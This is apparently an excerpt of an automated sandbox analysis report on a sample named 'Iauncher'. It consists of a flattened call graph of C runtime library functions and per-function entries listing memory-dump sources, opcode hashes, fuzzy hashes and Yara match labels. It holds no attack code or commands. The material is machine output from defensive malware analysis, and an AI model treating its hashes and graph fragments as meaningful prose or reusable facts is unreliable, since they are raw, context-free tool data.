14 API calls 20400->20402 20400->20409 20403 575466 _Ungetc 41 API calls 20401->20403 20402->20401 20404 576f82 20403->20404 20415 57f45a 20404->20415 20407 575466 _Ungetc 41 API calls 20408 576fc4 20407->20408 20408->20409 20410 575466 _Ungetc 41 API calls 20408->20410 20411 576fd2 20410->20411 20411->20409 20412 575466 _Ungetc 41 API calls 20411->20412 20413 576fe0 20412->20413 20414 575466 _Ungetc 41 API calls 20413->20414 20414->20409 20416 57f466 __FrameHandler3::FrameUnwindToState 20415->20416 20417 57f486 20416->20417 20418 57f46e 20416->20418 20419 57f543 20417->20419 20424 57f4bc 20417->20424 20420 56e2cd __dosmaperr 14 API calls 20418->20420 20422 56e2cd __dosmaperr 14 API calls 20419->20422 20421 57f473 20420->20421 20423 56e2e0 __dosmaperr 14 API calls 20421->20423 20425 57f548 20422->20425 20426 576f8a 20423->20426 20427 57f4c5 20424->20427 20428 57f4da 20424->20428 20429 56e2e0 __dosmaperr 14 API calls 20425->20429 20426->20407 20426->20409 20430 56e2cd __dosmaperr 14 API calls 20427->20430 20445 57a908 EnterCriticalSection 20428->20445 20432 57f4d2 20429->20432 20433 57f4ca 20430->20433 20435 56accf __strnicoll 41 API calls 20432->20435 20436 56e2e0 __dosmaperr 14 API calls 20433->20436 20434 57f4e0 20437 57f511 20434->20437 20438 57f4fc 20434->20438 20435->20426 20436->20432 20446 57f56e 20437->20446 20439 56e2e0 __dosmaperr 14 API calls 20438->20439 20441 57f501 20439->20441 20443 56e2cd __dosmaperr 14 API calls 20441->20443 20442 57f50c 20509 57f53b 20442->20509 20443->20442 20445->20434 20447 57f580 20446->20447 20448 57f598 20446->20448 20449 56e2cd __dosmaperr 14 API calls 20447->20449 20450 57f8ee 20448->20450 20455 57f5de 20448->20455 20451 57f585 20449->20451 20452 56e2cd __dosmaperr 14 API calls 20450->20452 20453 56e2e0 __dosmaperr 14 API calls 20451->20453 20454 57f8f3 20452->20454 20456 57f58d 20453->20456 20457 56e2e0 __dosmaperr 14 API calls 20454->20457 20455->20456 20458 57f5e9 20455->20458 20463 57f619 20455->20463 20456->20442 20459 57f5f6 20457->20459 20460 56e2cd __dosmaperr 14 API calls 20458->20460 20464 56accf __strnicoll 41 API calls 20459->20464 20461 57f5ee 20460->20461 20462 56e2e0 __dosmaperr 14 API calls 20461->20462 20462->20459 20465 57f632 20463->20465 20466 57f67d 20463->20466 20467 57f64c 20463->20467 20464->20456 20465->20467 20468 57f637 20465->20468 20470 5745c0 __strnicoll 15 API calls 20466->20470 20469 56e2cd __dosmaperr 14 API calls 20467->20469 20474 57ec51 ___scrt_uninitialize_crt 41 API calls 20468->20474 20471 57f651 20469->20471 20472 57f68e 20470->20472 20473 56e2e0 __dosmaperr 14 API calls 20471->20473 20476 574396 ___free_lconv_mon 14 API calls 20472->20476 20477 57f658 20473->20477 20475 57f7ca 20474->20475 20478 57f83e 20475->20478 20481 57f7e3 GetConsoleMode 20475->20481 20479 57f697 20476->20479 20480 56accf __strnicoll 41 API calls 20477->20480 20483 57f842 ReadFile 20478->20483 20482 574396 ___free_lconv_mon 14 API calls 20479->20482 20508 57f663 20480->20508 20481->20478 20486 57f7f4 20481->20486 20487 57f69e 20482->20487 20484 57f8b6 GetLastError 20483->20484 20485 57f85a 20483->20485 20488 57f8c3 20484->20488 20496 57f81a 20484->20496 20485->20484 20494 57f833 20485->20494 20486->20483 20489 57f7fa ReadConsoleW 20486->20489 20490 57f6c3 20487->20490 20491 57f6a8 20487->20491 20492 56e2e0 __dosmaperr 14 API calls 20488->20492 20489->20494 20495 57f814 GetLastError 20489->20495 20493 578b59 43 API calls 20490->20493 20498 56e2e0 __dosmaperr 14 API calls 20491->20498 20499 57f8c8 20492->20499 20493->20468 20503 57f896 20494->20503 20504 57f87f 20494->20504 20494->20508 20495->20496 20500 56e286 __dosmaperr 14 API calls 20496->20500 20496->20508 20497 574396 ___free_lconv_mon 14 API calls 20497->20456 20501 57f6ad 20498->20501 20502 56e2cd __dosmaperr 14 API calls 20499->20502 20500->20508 20505 56e2cd __dosmaperr 14 API calls 20501->20505 20502->20508 20503->20508 20525 57f0e0 20503->20525 20512 57f288 20504->20512 20505->20508 20508->20497 20537 57a92b LeaveCriticalSection 20509->20537 20511 57f541 20511->20426 20531 57ef94 20512->20531 20514 578f33 __strnicoll MultiByteToWideChar 20516 57f39c 20514->20516 20519 57f3a5 GetLastError 20516->20519 20522 57f2d0 20516->20522 20517 57f32a 20523 57f2e4 20517->20523 20524 578b59 43 API calls 20517->20524 20518 57f31a 20520 56e2e0 __dosmaperr 14 API calls 20518->20520 20521 56e286 __dosmaperr 14 API calls 20519->20521 20520->20522 20521->20522 20522->20508 20523->20514 20524->20523 20527 57f117 20525->20527 20526 57f1a7 20526->20508 20527->20526 20528 57f1ac ReadFile 20527->20528 20528->20526 20529 57f1c9 20528->20529 20529->20526 20530 578b59 43 API calls 20529->20530 20530->20526 20532 57efc8 20531->20532 20533 57f037 ReadFile 20532->20533 20534 57f032 20532->20534 20533->20534 20535 57f050 20533->20535 20534->20517 20534->20518 20534->20522 20534->20523 20535->20534 20536 578b59 43 API calls 20535->20536 20536->20534 20537->20511 21873 564fd1 21876 564ea5 21873->21876 21875 564fdc std::ios_base::_Ios_base_dtor 21877 564ed6 21876->21877 21878 564ee8 21877->21878 21880 5654a6 21877->21880 21878->21875 21881 5654b0 21880->21881 21885 5654ce 21880->21885 21882 565166 69 API calls 21881->21882 21883 5654bd 21882->21883 21886 56ec37 21883->21886 21885->21878 21887 56ec4a _Fputc 21886->21887 21892 56eb12 21887->21892 21889 56ec56 21890 56aa0b _Fputc 41 API calls 21889->21890 21891 56ec62 21890->21891 21891->21885 21893 56eb1e __FrameHandler3::FrameUnwindToState 21892->21893 21894 56eb4b 21893->21894 21895 56eb28 21893->21895 21902 56eb43 21894->21902 21903 56e417 EnterCriticalSection 21894->21903 21896 56ac52 _Deallocate 29 API calls 21895->21896 21896->21902 21898 56eb69 21904 56eba9 21898->21904 21900 56eb76 21918 56eba1 21900->21918 21902->21889 21903->21898 21905 56ebb6 21904->21905 21906 56ebd9 21904->21906 21907 56ac52 _Deallocate 29 API calls 21905->21907 21908 56ebd1 21906->21908 21909 56eea4 ___scrt_uninitialize_crt 66 API calls 21906->21909 21907->21908 21908->21900 21910 56ebf1 21909->21910 21911 576d01 14 API calls 21910->21911 21912 56ebf9 21911->21912 21913 575466 _Ungetc 41 API calls 21912->21913 21914 56ec05 21913->21914 21921 5775d3 21914->21921 21917 574396 ___free_lconv_mon 14 API calls 21917->21908 21963 56e42b LeaveCriticalSection 21918->21963 21920 56eba7 21920->21902 21922 5775fc 21921->21922 21925 56ec0c 21921->21925 21923 57764b 21922->21923 21926 577623 21922->21926 21924 56ac52 _Deallocate 29 API calls 21923->21924 21924->21925 21925->21908 21925->21917 21928 577542 21926->21928 21929 57754e __FrameHandler3::FrameUnwindToState 21928->21929 21936 57a908 EnterCriticalSection 21929->21936 21931 57755c 21932 57758d 21931->21932 21937 577676 21931->21937 21950 5775c7 21932->21950 21936->21931 21938 57a9df ___scrt_uninitialize_crt 41 API calls 21937->21938 21941 577686 21938->21941 21939 57768c 21953 57a94e 21939->21953 21941->21939 21942 57a9df ___scrt_uninitialize_crt 41 API calls 21941->21942 21949 5776be 21941->21949 21946 5776b5 21942->21946 21943 57a9df ___scrt_uninitialize_crt 41 API calls 21944 5776ca CloseHandle 21943->21944 21944->21939 21947 5776d6 GetLastError 21944->21947 21945 5776e4 ___scrt_uninitialize_crt 21945->21932 21948 57a9df ___scrt_uninitialize_crt 41 API calls 21946->21948 21947->21939 21948->21949 21949->21939 21949->21943 21962 57a92b LeaveCriticalSection 21950->21962 21952 5775b0 21952->21925 21954 57a9c4 21953->21954 21955 57a95d 21953->21955 21956 56e2e0 __dosmaperr 14 API calls 21954->21956 21955->21954 21961 57a987 21955->21961 21957 57a9c9 21956->21957 21958 56e2cd __dosmaperr 14 API calls 21957->21958 21959 57a9b4 21958->21959 21959->21945 21960 57a9ae SetStdHandle 21960->21959 21961->21959 21961->21960 21962->21952 21963->21920 22017 56e3cb 22018 56ef72 ___scrt_uninitialize_crt 70 API calls 22017->22018 22019 56e3d3 22018->22019 22027 576c56 22019->22027 22021 56e3d8 22022 576d01 14 API calls 22021->22022 22023 56e3e7 DeleteCriticalSection 22022->22023 22023->22021 22024 56e402 22023->22024 22025 574396 ___free_lconv_mon 14 API calls 22024->22025 22026 56e40d 22025->22026 22028 576c62 __FrameHandler3::FrameUnwindToState 22027->22028 22037 56d9e4 EnterCriticalSection 22028->22037 22030 576cd9 22038 576cf8 22030->22038 22032 576c6d 22032->22030 22033 576cad DeleteCriticalSection 22032->22033 22035 56ec37 71 API calls 22032->22035 22036 574396 ___free_lconv_mon 14 API calls 22033->22036 22035->22032 22036->22032 22037->22032 22041 56da2c LeaveCriticalSection 22038->22041 22040 576ce5 22040->22021 22041->22040 22062 5653e1 22063 565434 22062->22063 22064 5653e8 22062->22064 22067 56e417 EnterCriticalSection 22064->22067 22066 5653ed 22067->22066 20676 5658ea 20677 565904 20676->20677 20678 565916 20677->20678 20680 564c4b 20677->20680 20683 56ea94 20680->20683 20684 56eaa0 __FrameHandler3::FrameUnwindToState 20683->20684 20685 56eaa7 20684->20685 20686 56eabe 20684->20686 20687 56e2e0 __dosmaperr 14 API calls 20685->20687 20696 56e417 EnterCriticalSection 20686->20696 20689 56eaac 20687->20689 20691 56accf __strnicoll 41 API calls 20689->20691 20690 56eacd 20697 56e9de 20690->20697 20693 564c5d 20691->20693 20693->20678 20694 56eadb 20711 56eb0a 20694->20711 20696->20690 20698 56e9f4 20697->20698 20703 56ea7e _Ungetc 20697->20703 20699 5774e6 _Ungetc 14 API calls 20698->20699 20700 56ea22 20698->20700 20698->20703 20699->20700 20701 575466 _Ungetc 41 API calls 20700->20701 20700->20703 20702 56ea34 20701->20702 20704 56ea57 20702->20704 20705 575466 _Ungetc 41 API calls 20702->20705 20703->20694 20704->20703 20714 56e8d1 20704->20714 20706 56ea40 20705->20706 20706->20704 20708 575466 _Ungetc 41 API calls 20706->20708 20709 56ea4c 20708->20709 20710 575466 _Ungetc 41 API calls 20709->20710 20710->20704 20733 56e42b LeaveCriticalSection 20711->20733 20713 56eb10 20713->20693 20715 575466 _Ungetc 41 API calls 20714->20715 20716 56e8f4 20715->20716 20717 56e91d 20716->20717 20718 575466 _Ungetc 41 API calls 20716->20718 20723 56e957 20717->20723 20727 5752c2 20717->20727 20719 56e902 20718->20719 20719->20717 20721 575466 _Ungetc 41 API calls 20719->20721 20722 56e910 20721->20722 20724 575466 _Ungetc 41 API calls 20722->20724 20725 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20723->20725 20724->20717 20726 56e9d5 20725->20726 20726->20703 20728 5752d5 _Fputc 20727->20728 20729 575158 _Fputc 43 API calls 20728->20729 20730 5752ea 20729->20730 20731 56aa0b _Fputc 41 API calls 20730->20731 20732 5752f7 20731->20732 20732->20723 20733->20713 22142 57cd9a 22143 57cdb3 22142->22143 22144 57cdd1 22142->22144 22143->22144 22145 5756aa 2 API calls 22143->22145 22145->22143 19083 56418d 19084 564195 19083->19084 19085 56419d 19084->19085 19086 5657bd 70 API calls 19084->19086 19086->19085 18828 5770b5 18829 575466 _Ungetc 41 API calls 18828->18829 18831 5770c2 18829->18831 18830 5770ce 18831->18830 18832 57711a 18831->18832 18851 57744b 18831->18851 18832->18830 18839 57717c 18832->18839 18859 5754cf 18832->18859 18840 5772a5 18839->18840 18841 575466 _Ungetc 41 API calls 18840->18841 18842 5772b4 18841->18842 18843 5772c7 18842->18843 18844 57735a 18842->18844 18845 5772e4 18843->18845 18849 57730b 18843->18849 18846 57801e ___scrt_uninitialize_crt 66 API calls 18844->18846 18847 57801e ___scrt_uninitialize_crt 66 API calls 18845->18847 18848 57718d 18846->18848 18847->18848 18849->18848 18870 578afb 18849->18870 18852 577465 18851->18852 18853 577461 18851->18853 18854 57a9df ___scrt_uninitialize_crt 41 API calls 18852->18854 18858 5774b4 18852->18858 18853->18832 18855 577486 18854->18855 18856 57748e SetFilePointerEx 18855->18856 18855->18858 18857 5774a5 GetFileSizeEx 18856->18857 18856->18858 18857->18858 18858->18832 18861 5754db 18859->18861 18860 5754fc 18860->18839 18865 5774e6 18860->18865 18861->18860 18862 575466 _Ungetc 41 API calls 18861->18862 18863 5754f6 18862->18863 18898 57ec51 18863->18898 18866 574339 __Getctype 14 API calls 18865->18866 18867 577503 18866->18867 18868 574396 ___free_lconv_mon 14 API calls 18867->18868 18869 57750d 18868->18869 18869->18839 18871 578b0f _Fputc 18870->18871 18876 578952 18871->18876 18874 56aa0b _Fputc 41 API calls 18875 578b33 18874->18875 18875->18848 18877 57895e __FrameHandler3::FrameUnwindToState 18876->18877 18878 578a3c 18877->18878 18879 578966 18877->18879 18881 5789ba 18877->18881 18880 56ac52 _Deallocate 29 API calls 18878->18880 18879->18874 18880->18879 18887 57a908 EnterCriticalSection 18881->18887 18883 5789c0 18884 5789e5 18883->18884 18888 578a78 18883->18888 18894 578a34 18884->18894 18887->18883 18889 57a9df ___scrt_uninitialize_crt 41 API calls 18888->18889 18890 578a8a 18889->18890 18891 578aa6 SetFilePointerEx 18890->18891 18893 578a92 ___scrt_uninitialize_crt 18890->18893 18892 578abe GetLastError 18891->18892 18891->18893 18892->18893 18893->18884 18897 57a92b LeaveCriticalSection 18894->18897 18896 578a3a 18896->18879 18897->18896 18899 57ec5e 18898->18899 18901 57ec6b 18898->18901 18900 56e2e0 __dosmaperr 14 API calls 18899->18900 18903 57ec63 18900->18903 18902 56e2e0 __dosmaperr 14 API calls 18901->18902 18904 57ec77 18901->18904 18905 57ec98 18902->18905 18903->18860 18904->18860 18906 56accf __strnicoll 41 API calls 18905->18906 18906->18903 22253 572fa7 22254 572fc2 22253->22254 22255 572fb2 22253->22255 22259 572fc8 22255->22259 22258 574396 ___free_lconv_mon 14 API calls 22258->22254 22260 572fdd 22259->22260 22263 572fe3 22259->22263 22261 574396 ___free_lconv_mon 14 API calls 22260->22261 22261->22263 22262 574396 ___free_lconv_mon 14 API calls 22264 572fef 22262->22264 22263->22262 22265 574396 ___free_lconv_mon 14 API calls 22264->22265 22266 572ffa 22265->22266 22267 574396 ___free_lconv_mon 14 API calls 22266->22267 22268 573005 22267->22268 22269 574396 ___free_lconv_mon 14 API calls 22268->22269 22270 573010 22269->22270 22271 574396 ___free_lconv_mon 14 API calls 22270->22271 22272 57301b 22271->22272 22273 574396 ___free_lconv_mon 14 API calls 22272->22273 22274 573026 22273->22274 22275 574396 ___free_lconv_mon 14 API calls 22274->22275 22276 573031 22275->22276 22277 574396 ___free_lconv_mon 14 API calls 22276->22277 22278 57303c 22277->22278 22279 574396 ___free_lconv_mon 14 API calls 22278->22279 22280 57304a 22279->22280 22285 572df4 22280->22285 22286 572e00 __FrameHandler3::FrameUnwindToState 22285->22286 22301 56d9e4 EnterCriticalSection 22286->22301 22288 572e34 22302 572e53 22288->22302 22290 572e0a 22290->22288 22292 574396 ___free_lconv_mon 14 API calls 22290->22292 22292->22288 22293 572e5f 22294 572e6b __FrameHandler3::FrameUnwindToState 22293->22294 22306 56d9e4 EnterCriticalSection 22294->22306 22296 572e75 22297 573095 __Getctype 14 API calls 22296->22297 22298 572e88 22297->22298 22307 572ea8 22298->22307 22301->22290 22305 56da2c LeaveCriticalSection 22302->22305 22304 572e41 22304->22293 22305->22304 22306->22296 22310 56da2c LeaveCriticalSection 22307->22310 22309 572e96 22309->22258 22310->22309 22311 565ba5 22312 565bb1 __EH_prolog3_GS 22311->22312 22314 565c00 22312->22314 22318 565bc8 22312->22318 22322 565c1a 22312->22322 22325 564c07 22314->22325 22352 5662ce 22318->22352 22320 563359 std::ios_base::_Init 41 API calls 22320->22318 22321 565cc9 22321->22320 22322->22321 22324 565d04 22322->22324 22328 56405f 22322->22328 22332 56f017 22322->22332 22324->22321 22355 56fac7 22324->22355 22368 56e5af 22325->22368 22329 564086 22328->22329 22330 56406b 22328->22330 22452 561b59 22329->22452 22330->22322 22333 56f023 __FrameHandler3::FrameUnwindToState 22332->22333 22334 56f045 22333->22334 22335 56f02d 22333->22335 22461 56e417 EnterCriticalSection 22334->22461 22336 56e2e0 __dosmaperr 14 API calls 22335->22336 22338 56f032 22336->22338 22341 56accf __strnicoll 41 API calls 22338->22341 22339 56f04f 22340 56f0eb 22339->22340 22342 575466 _Ungetc 41 API calls 22339->22342 22462 56efd0 22340->22462 22351 56f03d 22341->22351 22347 56f06c 22342->22347 22344 56f0f1 22469 56f11b 22344->22469 22346 56f0c3 22348 56e2e0 __dosmaperr 14 API calls 22346->22348 22347->22340 22347->22346 22349 56f0c8 22348->22349 22350 56accf __strnicoll 41 API calls 22349->22350 22350->22351 22351->22322 22353 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22352->22353 22354 5662d8 22353->22354 22354->22354 22356 56fad3 __FrameHandler3::FrameUnwindToState 22355->22356 22357 56faef 22356->22357 22358 56fada 22356->22358 22473 56e417 EnterCriticalSection 22357->22473 22359 56e2e0 __dosmaperr 14 API calls 22358->22359 22361 56fadf 22359->22361 22363 56accf __strnicoll 41 API calls 22361->22363 22362 56faf9 22474 56f9ce 22362->22474 22365 56faea 22363->22365 22365->22324 22369 56e5bb __FrameHandler3::FrameUnwindToState 22368->22369 22370 56e5c2 22369->22370 22371 56e5d9 22369->22371 22372 56e2e0 __dosmaperr 14 API calls 22370->22372 22381 56e417 EnterCriticalSection 22371->22381 22374 56e5c7 22372->22374 22376 56accf __strnicoll 41 API calls 22374->22376 22375 56e5e5 22382 56e43f 22375->22382 22378 564c12 22376->22378 22378->22318 22379 56e5f0 22416 56e61e 22379->22416 22381->22375 22383 56e4c2 22382->22383 22384 56e45c 22382->22384 22386 575466 _Ungetc 41 API calls 22383->22386 22387 56e4b9 22383->22387 22385 575466 _Ungetc 41 API calls 22384->22385 22389 56e462 22385->22389 22390 56e4d7 22386->22390 22387->22379 22388 56e485 22388->22383 22400 56e4a0 22388->22400 22389->22388 22391 575466 _Ungetc 41 API calls 22389->22391 22392 56e4fa 22390->22392 22394 575466 _Ungetc 41 API calls 22390->22394 22393 56e46e 22391->22393 22392->22387 22395 56f00c 41 API calls 22392->22395 22393->22388 22399 575466 _Ungetc 41 API calls 22393->22399 22396 56e4e3 22394->22396 22398 56e51a 22395->22398 22396->22392 22402 575466 _Ungetc 41 API calls 22396->22402 22398->22387 22403 56dcf2 __Getctype 41 API calls 22398->22403 22401 56e47a 22399->22401 22400->22387 22419 56f00c 22400->22419 22404 575466 _Ungetc 41 API calls 22401->22404 22405 56e4ef 22402->22405 22406 56e532 22403->22406 22404->22388 22407 575466 _Ungetc 41 API calls 22405->22407 22408 56e55c 22406->22408 22410 56f00c 41 API calls 22406->22410 22407->22392 22426 57542f 22408->22426 22412 56e543 22410->22412 22412->22408 22413 56e549 22412->22413 22415 56fac7 43 API calls 22413->22415 22414 56e2e0 __dosmaperr 14 API calls 22414->22387 22415->22387 22451 56e42b LeaveCriticalSection 22416->22451 22418 56e624 22418->22378 22420 56efd0 22419->22420 22421 56e2e0 __dosmaperr 14 API calls 22420->22421 22422 56eff1 22420->22422 22423 56efe1 22421->22423 22422->22400 22424 56accf __strnicoll 41 API calls 22423->22424 22425 56efec 22424->22425 22425->22400 22427 575442 _Fputc 22426->22427 22432 5752fc 22427->22432 22430 56aa0b _Fputc 41 API calls 22431 56e570 22430->22431 22431->22387 22431->22414 22433 575310 22432->22433 22442 575320 22432->22442 22434 575345 22433->22434 22435 56b7f0 _Fputc 41 API calls 22433->22435 22433->22442 22436 575356 22434->22436 22437 575379 22434->22437 22435->22434 22444 57eb06 22436->22444 22439 5753f5 22437->22439 22440 5753a1 22437->22440 22437->22442 22441 578f33 __strnicoll MultiByteToWideChar 22439->22441 22440->22442 22443 578f33 __strnicoll MultiByteToWideChar 22440->22443 22441->22442 22442->22430 22443->22442 22447 5807a3 22444->22447 22450 5807ce _Fputc 22447->22450 22448 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22449 57eb21 22448->22449 22449->22442 22450->22448 22451->22418 22453 561b72 std::ios_base::_Init 22452->22453 22454 561bde 22452->22454 22457 56116b std::ios_base::_Init 43 API calls 22453->22457 22455 5633a8 std::ios_base::_Init 43 API calls 22454->22455 22456 561be3 22455->22456 22458 561b91 22457->22458 22459 5613c0 _Deallocate 41 API calls 22458->22459 22460 561bc3 22458->22460 22459->22460 22460->22330 22461->22339 22463 56eff1 22462->22463 22464 56efdc 22462->22464 22463->22344 22465 56e2e0 __dosmaperr 14 API calls 22464->22465 22466 56efe1 22465->22466 22467 56accf __strnicoll 41 API calls 22466->22467 22468 56efec 22467->22468 22468->22344 22472 56e42b LeaveCriticalSection 22469->22472 22471 56f121 22471->22351 22472->22471 22473->22362 22475 56f9e6 22474->22475 22477 56fa56 22474->22477 22476 575466 _Ungetc 41 API calls 22475->22476 22480 56f9ec 22476->22480 22478 5774e6 _Ungetc 14 API calls 22477->22478 22479 56fa4e 22477->22479 22478->22479 22485 56fb32 22479->22485 22480->22477 22481 56fa3e 22480->22481 22482 56e2e0 __dosmaperr 14 API calls 22481->22482 22483 56fa43 22482->22483 22484 56accf __strnicoll 41 API calls 22483->22484 22484->22479 22488 56e42b LeaveCriticalSection 22485->22488 22487 56fb38 22487->22365 22488->22487

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 0057A789 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4712b80276cd771b58b8e09bf769c485b2bc14740f32cbc8fff33ad459dada42
                                                                                                                                                    • Instruction ID: f7f2dfd2968e96a752f50a4316494520d8aaf1e3d46847255f723b651c777065
                                                                                                                                                    • Opcode Fuzzy Hash: 4712b80276cd771b58b8e09bf769c485b2bc14740f32cbc8fff33ad459dada42
                                                                                                                                                    • Instruction Fuzzy Hash: 1FE08C72912228EBCB19DBC8D90898AF7FCFB84B00B1188A6F50AD3201D2B0DE00D7D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00570E87 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: eedd12195004b50f187168fbc7ef43d299e5fc9ab837594ef173dd7107a705ca
                                                                                                                                                    • Instruction ID: 5c94c5bb7f2b5dd1d20e19cffa3d298a53f6880de57231a53dcef7169ea5997e
                                                                                                                                                    • Opcode Fuzzy Hash: eedd12195004b50f187168fbc7ef43d299e5fc9ab837594ef173dd7107a705ca
                                                                                                                                                    • Instruction Fuzzy Hash: 78C08C74010A10CBCF298910A371BBA37A8F3D6782F806C8CC84A0B682D51EAC82F601
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005759BC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 5759bc-5759c8 1 575a5a-575a5d 0->1 2 575a63 1->2 3 5759cd-5759de 1->3 4 575a65-575a69 2->4 5 5759e0-5759e3 3->5 6 5759eb-575a04 LoadLibraryExW 3->6 7 575a83-575a85 5->7 8 5759e9 5->8 9 575a06-575a0f GetLastError 6->9 10 575a6a-575a7a 6->10 7->4 12 575a57 8->12 13 575a11-575a23 call 572d68 9->13 14 575a48-575a55 9->14 10->7 11 575a7c-575a7d FreeLibrary 10->11 11->7 12->1 13->14 17 575a25-575a37 call 572d68 13->17 14->12 17->14 20 575a39-575a46 LoadLibraryExW 17->20 20->10 20->14
                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,940D2BD2,?,00575AC9,?,?,00000000,00000000), ref: 00575A7D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                    • Opcode ID: 983ec614eabb1074214c8524db80e8d0e48f87299a8e29ded99b38efc0c4860d
                                                                                                                                                    • Instruction ID: b84c1242fdbea7eda980ab697b976c7b6d7f5eac478a713b38ad3eba91998bec
                                                                                                                                                    • Opcode Fuzzy Hash: 983ec614eabb1074214c8524db80e8d0e48f87299a8e29ded99b38efc0c4860d
                                                                                                                                                    • Instruction Fuzzy Hash: 53210832A01611EBC7229B64FC84A5A3F58FB55762F248230ED1DB7290F670EE04E7D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005769BB Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
